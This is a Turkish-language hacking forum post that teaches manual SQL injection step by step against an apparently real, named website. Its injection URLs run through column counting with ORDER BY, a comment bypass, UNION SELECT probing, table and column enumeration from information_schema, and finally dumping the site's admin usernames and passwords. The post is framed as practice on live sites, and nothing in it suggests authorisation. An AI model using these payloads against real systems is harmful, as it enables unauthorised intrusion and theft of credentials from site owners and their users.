Manuel Blind SQL İnjection Anlatım-Örneği #2

02-04-2021, 01:04:10

#1
Quantaism

Açık Profil bilgileri

Özel Mesaj Gönder

Quantaism tarafından gönderilen tüm mesajları bul

Quantaism'ı arkadaş olarak ekle
Öncelikle Herkese Selamun Aleyküm Arkadaşlar

Manuel Sql İnjection konusunda tecrübe kazanabileceğimiz,basitten zora doğru giden siteleri ele alacağım... Her 1 site yeni bir bilgi yeni bir tecrübe demektir.

Blind SQL İnjection : Blind(Yani Kör) Sql injection,web sayfasında hata çıktısı vermeden sayfanın yapısını bozmaktır.Örnek vericek olursak basit bir sayfa düşünelim ortada bir img ve altında img yi anlatan bir yazı varsayalım. sayfamızda .php?id=xx olsun. .php?id=xx'(tırnak) karakterini koyduğumuz da o sayfada img göstermiyor, yada img gösterip yazıları göstermiyor. yada yazının bi kısmını göstermiyor ise bu web sayfasında Blind SQL İnjection açığı olabilir.

Örnek Blind SQL İnjection içeren web sitemiz ;
Kod:
http://www.ise.ac/index.php?ID=11

" ' " (Tırnak) koyduğumuz zaman ;
Kod:
http://www.ise.ac/index.php?ID=11'

Bakın resim ve yazılar gelmedi, şimdi kolon sayısını öğrenelim (:
dostlar bildiğimiz üzere /index.php?ID=11'+order+by+1 üzerinden gittiğimizde sayfa düzgün bir şekilde karşılamıyor bizi, bunun için sonuna(URL BALANCER) --+- bypassı ekliyoruz.

Kod:
http://www.ise.ac/index.php?ID=11'+order+by+1--+-

Evet şuan sayfa normal şekilde yüklendi, sayfada az önceki gibi resimler ve yazılar gelmeyene kadar bir bir arttırıyoruz.
Kod:
http://www.ise.ac/index.php?ID=11'+order+by+3--+-
3 de img ve yazılar gelmedi, demek ki kolon sayımız 2
Şimdi zaafiyetli kolonlarımızı yansıttıralım...
Kod:
http://www.ise.ac/index.php?ID=-11' Union Select 1,2--+-

Eee normal de sayfanın doğru bir şekilde gelmesi ve zaafiyetli kolonun sayısını görmemiz gerekiyor?
belki de kaynak koduna bakarak(view-source)da zaafiyetli kolonu bulabiliriz?
ctrl u yaparak kaynak koda girelim, ama burada 1 ve 2 yi aramak çok zor olacaktır bu yüzden ben deneme yanılma yaparak buluyorum, yani zaafiyetli kolonun 2 olduğunu varsayalım 2 yerine 'hacked' yazıyorum ve kaynak kodda hacked diye aratıyorum.

Kod:
http://www.ise.ac/index.php?ID=-11' Union Select 1,'hacked'--+-

Bakın "hacked" yazdırabildik.demek ki zaafiyetli kolunumuz 2' imiş.
Şimdi normal işlemlerimize devam ediyoruz.

Kod:
http://www.ise.ac/index.php?ID=-11' Union Select 1,group_concat(table_name,0x3a,column_name)+from+i nformation_schema.columns+where+table_schema=datab ase()--+-

evet tablo ve kolonlarımızı yazdırmayı başardık . şimdi dump edelim (:

Kod:
http://www.ise.ac/index.php?ID=-11' Union Select 1,group_concat(username,0x3a,password)+from+admin--+-

dostlar konumun baltalanmasını istemiyorum,konu basit özet geçmek gerekir ise blind sql injectionu görselleriyle anlamak ve her zaman basit bir şekilde ekranda yazmadığını anlatmak istedim... daha çok zorlayıcı web siteleriyle görüşmek üzere,

sağlıcakla kalın...